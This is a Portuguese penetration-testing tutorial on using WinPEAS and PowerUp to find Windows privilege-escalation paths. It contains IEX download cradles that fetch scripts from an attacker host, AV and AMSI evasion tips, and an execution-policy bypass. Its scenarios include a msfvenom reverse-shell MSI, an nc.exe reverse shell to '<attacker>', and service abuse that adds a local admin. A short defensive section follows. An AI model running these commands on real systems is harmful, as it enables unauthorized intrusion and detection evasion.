WinPEAS e PowerUp
Ferramentas de enumeração automatizada que encontram vetores de escalação de privilégios em segundos
O que você vai descobrir
🎯 Por que isso importa
A enumeração manual é completa mas demorada. WinPEAS e PowerUp escaneiam centenas de vetores de escalação de privilégios em segundos, fornecendo caminhos de ataque imediatos. Essas são as mesmas ferramentas usadas em testes de penetração profissionais e operações de red team.
🔍 O que você vai aprender
- Como implantar e executar WinPEAS em sistemas alvo
- Funções do PowerUp.ps1 e seus casos de uso
- Interpretar resultados de scan para priorizar caminhos de ataque
- Evitar detecção ao executar ferramentas automatizadas
🚀 Sua primeira vitória
Nos próximos 10 minutos, você vai entender como executar WinPEAS e PowerUp, e como interpretar sua saída para encontrar caminhos de escalação de privilégios exploráveis.
🔧 Experimente agora
Baixe WinPEAS e examine suas opções de ajuda:
# Baixar WinPEAS (na sua máquina de ataque)
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe
# Transferir para o alvo e executar
.\winPEASx64.exe -h
.\winPEASx64.exe quietVocê verá: Saída abrangente cobrindo info do sistema, privilégios de usuário, serviços, tarefas agendadas, rede, e centenas de outras verificações - tudo codificado por cor conforme severidade.
Habilidades que você vai dominar
✅ Compreensão fundamental
- Execução e interpretação do WinPEAS
- Estrutura e funções dos módulos PowerUp
- Severidade codificada por cor nos resultados
- Técnicas básicas de evasão
🔍 Habilidades especializadas
- Scan seletivo para evitar detecção
- Técnicas de execução em memória
- Combinando resultados manuais e automatizados
- Scripts de enumeração personalizados
Entendendo a enumeração automatizada
WinPEAS e PowerUp são as ferramentas padrão da indústria para enumeração de escalação de privilégios Windows. Elas automatizam centenas de verificações que levariam horas para realizar manualmente. No entanto, também são bem conhecidas pelos defensores, então saber como usá-las efetivamente - e silenciosamente - é essencial.
WinPEAS = Scan abrangente | PowerUp = Baseado em PowerShell, funções direcionadas
Visão geral do WinPEAS
WinPEAS (Windows Privilege Escalation Awesome Scripts) faz parte da suíte PEASS-ng. Está disponível como executável ou script batch e escaneia más configurações em todo o sistema:
# Executar scan completo (padrão)
.\winPEASx64.exe
# Executar scan quiet (menos saída, mais rápido)
.\winPEASx64.exe quiet
# Executar apenas verificações específicas
.\winPEASx64.exe servicesinfo
.\winPEASx64.exe userinfo
.\winPEASx64.exe systeminfo
# Redirecionar saída para arquivo (para revisão)
.\winPEASx64.exe > winpeas_output.txtWinPEAS usa codificação por cores para indicar severidade:
VERMELHO
Crítico - privesc imediato possível
AMARELO
Interessante - investigar mais
VERDE
Informacional
Visão geral do PowerUp
PowerUp é um script PowerShell do framework PowerSploit. Diferente do scan abrangente do WinPEAS, PowerUp fornece funções individuais que você pode chamar conforme necessário:
# Carregar PowerUp
Import-Module .\PowerUp.ps1
# Executar todas as verificações
Invoke-AllChecks
# Ou executar da memória (AMSI pode bloquear)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecksFunções chave do PowerUp
PowerUp fornece funções específicas para enumeração direcionada:
# Enumeração de serviços
Get-UnquotedService # Encontrar caminhos de serviço sem aspas
Get-ModifiableServiceFile # Serviços com binários com permissão de escrita
Get-ModifiableService # Serviços que podemos reconfigurar
# Verificações de registro
Get-RegistryAlwaysInstallElevated # Verificar AlwaysInstallElevated
Get-RegistryAutoLogon # Encontrar credenciais autologon
# Tarefas agendadas e inicialização
Get-ModifiableScheduledTaskFile # Binários de tarefas agendadas com permissão de escrita
# Funções de exploração
Write-ServiceBinary # Substituir um binário de serviço
Install-ServiceBinary # Instalar um novo serviço
Invoke-ServiceAbuse # Abusar de um serviço modificávelFerramentas e técnicas
Uso detalhado do WinPEAS
WinPEAS aceita parâmetros para focar em áreas específicas:
# Módulos de scan disponíveis
.\winPEASx64.exe systeminfo # Informações básicas do sistema
.\winPEASx64.exe userinfo # Informações de usuário e grupo
.\winPEASx64.exe processinfo # Processos em execução
.\winPEASx64.exe servicesinfo # Serviços Windows
.\winPEASx64.exe applicationsinfo # Aplicações instaladas
.\winPEASx64.exe networkinfo # Configuração de rede
.\winPEASx64.exe windowscreds # Caça a credenciais
.\winPEASx64.exe browserinfo # Credenciais salvas do navegador
.\winPEASx64.exe filesinfo # Arquivos interessantes
.\winPEASx64.exe eventsinfo # Eventos de segurança
# Combinar módulos
.\winPEASx64.exe servicesinfo windowscredsTécnicas de evasão
Ambas as ferramentas são fortemente assinadas. Veja como reduzir a detecção:
# Usar a versão .bat do WinPEAS (menos detectada)
.\winPEAS.bat
# Execução ofuscada do PowerUp
$text = (New-Object Net.WebClient).DownloadString('https://<attacker>/PowerUp.ps1')
IEX $text
# Bypass AMSI para PowerShell (várias técnicas)
# Nota: Bypasses AMSI mudam frequentemente conforme Microsoft corrige
# Usar Invoke-Obfuscation no PowerUp antes do deploy
# https://github.com/danielbohannon/Invoke-Obfuscation
# Executar WinPEAS da memória usando um loader
# Embutir em um loader C# ou usar reflectionFerramentas alternativas
Quando WinPEAS e PowerUp são bloqueados, alternativas existem:
- Seatbelt - Ferramenta C# para survey de host, menos detectada que WinPEAS
- PrivescCheck - Script privesc PowerShell, alternativa ao PowerUp
- JAWS - Just Another Windows (Enum) Script, baseado em PowerShell
- winPEASps1 - Versão PowerShell do WinPEAS
Cenários de ataque reais
🔴 Cenário: WinPEAS revela AlwaysInstallElevated
A saída do WinPEAS mostra que AlwaysInstallElevated está habilitado em HKLM e HKCU. Isso significa que qualquer pacote .msi vai instalar com privilégios SYSTEM. Gere um MSI malicioso com msfvenom e execute para SYSTEM instantâneo.
# Na máquina atacante
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker> LPORT=443 -f msi -o shell.msi
# No alvo
msiexec /quiet /qn /i \\<attacker>\share\shell.msi🟠 Cenário: PowerUp identifica serviço modificável
Get-ModifiableService revela um serviço personalizado executando como LocalSystem onde seu usuário tem direitos SERVICE_CHANGE_CONFIG. Use Invoke-ServiceAbuse para reconfigurar o serviço e executar comandos arbitrários.
# Abusar do serviço para adicionar usuário aos admins locais
Invoke-ServiceAbuse -Name 'VulnerableService' -UserName 'hdna' -Password 'Password123!'
# Ou executar um reverse shell
Invoke-ServiceAbuse -Name 'VulnerableService' -Command "C:\temp\nc.exe -e cmd.exe <attacker> 443"💡 Dica de especialista
Não confie cegamente em ferramentas automatizadas. Elas podem produzir falsos positivos e perder vulnerabilidades dependentes de contexto. Use-as como ponto de partida, depois valide as descobertas manualmente. A melhor abordagem combina scan automatizado para cobertura com investigação manual para profundidade.
Contramedidas defensivas
Detecção de endpoint
- Implantar soluções EDR que detectam WinPEAS, PowerUp e ferramentas similares
- Habilitar logging ScriptBlock do PowerShell para capturar scripts maliciosos
- Monitorar padrões de comandos de enumeração conhecidos
- Alertar sobre acesso a chaves de registro e arquivos sensíveis
Controle de aplicações
- Implementar application whitelisting com Windows Defender Application Control
- Bloquear execução de diretórios com permissão de escrita (%TEMP%, Downloads)
- Restringir PowerShell ao modo Constrained Language
- Desabilitar motores de script desnecessários
Hardening proativo
- Executar WinPEAS e PowerUp em seus próprios sistemas durante avaliações de segurança
- Corrigir más configurações antes que atacantes as encontrem
- Scan de vulnerabilidades regular e gerenciamento de patches
- Implementar princípio do menor privilégio em todos os serviços e contas
Perguntas frequentes
WinPEAS está sendo detectado pelo AV. O que devo fazer?
Tente a versão .bat que é menos assinada, use as versões ofuscadas dos releases PEASS-ng, ou considere ferramentas alternativas como Seatbelt ou PrivescCheck. Você também pode compilar WinPEAS você mesmo com modificações para evitar assinaturas.
PowerUp falha com "cannot be loaded because running scripts is disabled." E agora?
Isso é a política de execução do PowerShell. Contorne com: powershell -ep bypass -c "IEX(Get-Content .\PowerUp.ps1 -Raw); Invoke-AllChecks" ou use o download cradle para executar da memória.
Qual ferramenta devo executar primeiro - WinPEAS ou PowerUp?
WinPEAS para cobertura abrangente, PowerUp quando você quer verificações direcionadas ou precisa de funções de exploração. Na prática, execute WinPEAS para enumeração e tenha PowerUp pronto para exploração quando encontrar um vetor.
🎯 Enumeração automatizada - Equipado!
Você agora sabe como usar WinPEAS e PowerUp para identificar rapidamente vetores de escalação de privilégios. Combinado com enumeração manual, você tem cobertura abrangente de qualquer sistema Windows.
Pronto para explorar más configurações de serviços →